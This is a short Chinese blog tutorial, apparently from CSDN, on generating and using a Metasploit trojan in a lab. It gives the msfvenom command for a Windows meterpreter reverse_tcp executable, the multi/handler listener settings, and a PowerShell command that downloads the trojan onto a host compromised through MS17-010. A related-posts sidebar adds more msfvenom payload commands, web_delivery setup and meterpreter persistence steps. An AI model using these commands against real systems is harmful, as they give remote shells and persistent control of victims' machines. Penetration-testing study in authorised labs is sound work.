MSF木马的简单利用

最新推荐文章于 2024-05-02 17:17:39 发布
最新推荐文章于 2024-05-02 17:17:39 发布
阅读量1.3k 收藏 7
点赞数
分类专栏: WEB 漏洞复现和分析 文章标签: MSF木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/91046949
版权

刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他
环境和那一片的一样

  1. msfvenom模块,首先生成.exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe

1.exe 就是木马 要把这个用各种方法去受害机运行

在这里插入图片描述
2. 输入msfconsole进入metasploi
3. 进入监听模块

use exploit/multi/handler
  1. 设置payload反弹
set payload windows/meterpreter/reverse_tcp
  1. 设置监听ip端口
set lhost 10.77.0.109
set lport 4443
要与木马一致
  1. 运行在这里插入图片描述
    kali这边就准备完了,等待上线

在目标主机运行 1.exe 木马

利用是之前的ms17010直接shell

powershell (new-object System.Net.WebClient).DownloadFile( 'http://10.77.0.100/1.exe','c:\1.exe')

在这里插入图片描述
上线成功

后续的。。再写

god_Zeo
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3056
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2244
使用msfvenom生成木马控制手机
【网络安全】 MSF生成木马教程,网络安全框架
2401_84240742的博客
04-11 938
3、免杀加壳:本例用的是 Themida。
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
最新发布
2401_84263434的博客
05-02 1043
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
msf_木马
jinhezhai的博客
05-13 2288
使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机 1.制作木马 打开kali虚拟机 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe 使用msfvenom生成木马, 在渗透过程中,MSF漏洞利用
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4459
使用kali制作Android木马并进行通讯录渗透的学习笔记
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
msf简单运用基础篇
12-16
msf简单运用基础篇,一步一步慢慢来。努力加油
msf学习之木马
fake_hydra的博客
07-29 2090
msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X >text.exe 生成一个text.exe的木马文件 msf > use exploit/multi/handler 使用handler这个模块 msf exploit(
msf扫描服务器漏洞,并发现漏洞对系统的入侵
b312738566的博客
10-20 1461
学会利用扫描工具来扫描服务器的漏洞,并通过发现的漏洞对系统进行入侵,上传木马并远程控制服务器,学生通过实验感性认识黑客入侵。工具软件:metasploit、windows系统、木马启动Msfconsole。
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 941
msf——PHP后门反弹连接
vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器
weixin_39805387的博客
12-06 297
一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好...
利用Msfvenom制作木马
qq_56150805的博客
03-30 580
msf配置监听之前要配置payload,不然就会连接不上。
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 8785
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9254
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
msf木马生成后怎么永久
06-06
在Metasploit Framework (MSF)中生成的木马默认情况下不是永久性的,它只是在目标机器上运行一次。如果您想让生成的木马在目标机器上保持永久性,您需要将其绑定到一个持久化机制上,例如Windows系统中的计划任务或服务。 以下是一个示例,演示如何使用Metasploit Framework (MSF)生成一个永久性后门,该后门将在Windows系统中的计划任务中运行: 1. 在MSF中,生成一个木马,例如Windows反向TCP后门: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [您的IP地址] set LPORT [监听端口号] run ``` 2. 在目标机器上,使用Meterpreter会话执行以下命令,将生成的后门绑定到Windows计划任务中: ``` run persistence -U -i 30 -p [监听端口号] -r [您的IP地址] ``` 其中,“-U”表示使用用户级别的持久性,即只有当前用户登录时才会运行后门;“-i 30”表示每隔30秒就会检查后门是否运行,如果没有运行,则会自动启动;“-p”和“-r”选项分别指定监听端口和您的IP地址。 3. 等待目标机器执行计划任务,后门将在后台运行,并且每隔30秒检查一次是否运行。 请注意,将生成的后门绑定到一个持久化机制上可能会被杀毒软件或安全软件检测到,并且可能会被视为恶意软件。因此,使用此方法时请务必谨慎,并仅在合法授权的测试环境中使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值